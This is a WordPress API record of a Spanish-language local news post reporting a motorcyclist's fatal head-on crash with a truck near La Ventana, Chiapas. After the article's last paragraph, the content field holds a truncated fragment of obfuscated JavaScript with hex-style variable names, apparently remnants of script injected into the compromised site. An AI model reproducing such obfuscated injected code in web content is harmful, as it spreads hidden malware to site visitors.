{"id":20483,"date":"2025-02-20T04:13:59","date_gmt":"2025-02-20T04:13:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20483"},"modified":"2025-02-20T04:14:00","modified_gmt":"2025-02-20T04:14:00","slug":"fallec-motociclista-en-la-comunidad-la-ventana","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20483","title":{"rendered":"Fallec@ motociclista en La comunidad La Ventana"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"630\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0031-1024x630.jpg\" alt=\"\" class=\"wp-image-20484\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0031-1024x630.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0031-300x185.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0031-768x472.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250219-WA0031.jpg 1200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 19 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde un motociclista perdi\u00f3 la vid@ al impactarse de frente contra un cami\u00f3n de la empresa Coma en el tramo carretero Ocosingo-San Crist\u00f3bal a la altura de la Comunidad La Ventana.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho fue reportado por los mismos automovilistas que observaron a un hombre tirado y as\u00ed como una moto a un costado.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil y determinaron que el sujeto ya hab\u00eda perdido la vida.<\/p>\n\n\n\n<p>Por usos y costumbres el cuerpo fue entregado a los familiares para darle sepultura.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 19 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles por la tarde un motociclista perdi\u00f3 la vid@ al impactarse de frente contra un cami\u00f3n de la empresa Coma en el tramo carretero Ocosingo-San Crist\u00f3bal a la altura de la Comunidad La Ventana. De acuerdo con los reportes oficiales este hecho &hellip;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20483","post","type-post","status-publish","format-standard","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20483"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20483\/revisions"}],"predecessor-version":[{"id":20485,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20483\/revisions\/20485"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20483"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20483"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}